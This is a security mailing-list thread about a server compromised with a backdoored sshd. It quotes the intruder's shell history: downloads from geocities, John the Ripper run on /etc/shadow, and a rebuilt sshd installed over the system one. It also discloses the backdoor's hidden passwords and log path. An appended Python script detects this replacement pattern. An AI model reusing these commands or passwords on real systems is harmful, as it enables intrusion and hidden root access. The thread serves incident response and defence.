Security Incidents mailing list archives
Re: SSH compiled with backdoor
From: "VeNoMouS" <venom () gen-x co nz>
Date: Tue, 30 Aug 2005 15:17:48 +1200
Hi Steve, I actually wrote that patch back in like shit 2001 or something. It logs all ssh connection logins in plain to a txt file; it also puts a backdoor passwd into the ssh and won't show up in wtmp, making the user (whatever he logs in as) invisible, so say you log in with the username root and you use the global hidden passwd, it will allow him on as root.

Looking at the code, he uses the following passwds for this global passwd: "toji" and "fv11r01rc3@l". The file that logs all the logins with time stamps and src ips is "dev/saux".

Hope this helps you; if you require any further information email me back, been a few years since I even looked at this code.

---------- Forwarded message ----------
From: steve () example org <steve () example org>
Date: 27 Aug 2005 13:02:08 -0000
Subject: SSH compiled with backdoor
To: incidents () securityfocus com

Hi!

One of my web servers was hacked on July 17, 2005. bash_history showed:

    w
    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
    pico genx.h
    pico genx.h
    pico ssh2includes.h
    cd ../..
    ./configure --without-x
    make
    make install
    mkdir /lib/java
    cp /usr/sbin/sshd a
    mv a /lib/java
    rm -rf /usr/sbin/sshd
    cp /usr/local/sbin/sshd /usr/sbin
    /etc/rc.d/init.d/sshd restart
    /etc/rc.d/init.d/ssh restart
    locate init.d
    /etc/init.d/sshd restart
    w
    reboot

According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there. I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault. A ps x showed mech.tgz trying to be downloaded, and a bunch of other CRON processes running.
The auth log didn't show other logins, though, so the ssh installed must have logging turned off for the backdoor they installed. I filled out an abuse form at geocities for the accounts hosting the software after downloading the software (I couldn't find the tgz files on my system).

Last showed:

    reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15          (37+11:47)
    website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)
    website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)
    website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)

whois says:

    inetnum:  193.231.77.0 - 193.231.77.255
    netname:  DATANET-RO
    descr:    Starnets - Datanet
    country:  RO
    address:  DATA NET
    address:  Str. Ioan N. Roman Nr. 13
    address:  Constanta, cod 900199, ROMANIA

Best Regards,
Steve
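[Editor's added example, not code from either poster or from the backdoored sshd tree discussed above.] The thread's practical lesson is that a rebuilt sshd with a hidden password leaves nothing in wtmp or the auth log, so the evidence that survives is the shell history and the binary itself: the system sshd was removed, a freshly built one copied over it, and the original parked under /lib/java. The script below does the two checks a responder would run against that pattern: it scans a history dump for the replacement chain (download of an sshd source archive, build, copy-aside, removal, overwrite, restart), and it compares the installed binary against a known-good SHA-256 while searching a directory tree for any file that still carries that hash, which is where a displaced original turns up. Assumptions: the known-good hash comes from the distribution package or a pre-incident backup (rpm -V or debsums would supply it in practice); the sample history is constructed from the commands Steve quoted; the indicator names and the placeholder file contents in the demo are made up for this example.

```python
import hashlib
import os
import re
import tempfile

# Constructed sample: the commands Steve quoted from bash_history, one
# history entry per line. Not a capture from any live system.
SAMPLE_HISTORY = """\
w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
"""

# Indicators of an sshd replacement, matched against single commands.
# The names are labels chosen for this example, not a standard taxonomy.
INDICATORS = {
    "fetch_sshd_source": re.compile(r"\b(wget|curl|ftp)\b.*sshd?[^\s]*\.(tar\.gz|tgz)"),
    "build_from_source": re.compile(r"^make(\s+install)?$"),
    "copy_system_sshd": re.compile(r"\bcp\s+/usr/sbin/sshd\b"),
    "remove_system_sshd": re.compile(r"\brm\s+(-\S+\s+)*/usr/sbin/sshd\b"),
    "overwrite_system_sshd": re.compile(r"\bcp\s+\S*sshd\s+/usr/sbin/?(sshd)?\s*$"),
    "restart_sshd": re.compile(r"init\.d/sshd?\s+restart"),
}


def scan_history(text):
    """Split a history dump into individual commands (newlines and ';')
    and map each matched indicator name to the commands that triggered it."""
    hits = {}
    for line in text.splitlines():
        for cmd in line.split(";"):
            cmd = cmd.strip()
            if not cmd:
                continue
            for name, pattern in INDICATORS.items():
                if pattern.search(cmd):
                    hits.setdefault(name, []).append(cmd)
    return hits


def sshd_replacement_suspected(hits):
    """Treat the chain as a replacement when the system binary was both
    removed and overwritten; the source download alone is only a hint."""
    return "remove_system_sshd" in hits and "overwrite_system_sshd" in hits


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_sshd(installed_path, known_good_sha256, search_roots=()):
    """Compare the installed sshd with a trusted hash (assumed to come from
    the package manager or a pre-incident backup) and walk search_roots for
    any file carrying that hash, i.e. a copy of the original moved aside."""
    installed_ok = sha256_file(installed_path) == known_good_sha256
    displaced = []
    for root in search_roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    if sha256_file(path) == known_good_sha256:
                        displaced.append(path)
                except OSError:
                    continue  # unreadable or vanished file; keep scanning
    return {"installed_matches_baseline": installed_ok,
            "displaced_copies": sorted(displaced)}


def demo_verify():
    """Throwaway tree mirroring the page's layout: the original sshd parked
    at lib/java/a and a different binary installed at usr/sbin/sshd.
    File contents are placeholders standing in for real ELF binaries."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr", "sbin"))
        os.makedirs(os.path.join(root, "lib", "java"))
        original = b"original distribution sshd (placeholder)"
        with open(os.path.join(root, "lib", "java", "a"), "wb") as f:
            f.write(original)
        with open(os.path.join(root, "usr", "sbin", "sshd"), "wb") as f:
            f.write(b"rebuilt sshd with genx.h patch (placeholder)")
        baseline = hashlib.sha256(original).hexdigest()
        return verify_sshd(os.path.join(root, "usr", "sbin", "sshd"), baseline,
                           search_roots=[os.path.join(root, "lib")])


if __name__ == "__main__":
    found = scan_history(SAMPLE_HISTORY)
    print("indicators:", sorted(found),
          "replacement suspected:", sshd_replacement_suspected(found))
    print(demo_verify())
```

Two caveats a responder should keep in mind. The history scan only works when the intruder leaves bash_history behind, as happened here; it is corroboration, not a detector. The hash check is only as good as its baseline: take the reference hash from the distribution package, never from the running host, because a binary rebuilt from patched source will hash differently from the package's sshd but will be self-consistent with anything captured after the compromise.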
Current thread:
- SSH compiled with backdoor steve (Aug 29)
- Re: SSH compiled with backdoor Francesca Smith (Aug 29)
- Re: SSH compiled with backdoor Javier Fernandez-Sanguino (Aug 30)
- Message not available
- Re: SSH compiled with backdoor VeNoMouS (Aug 30)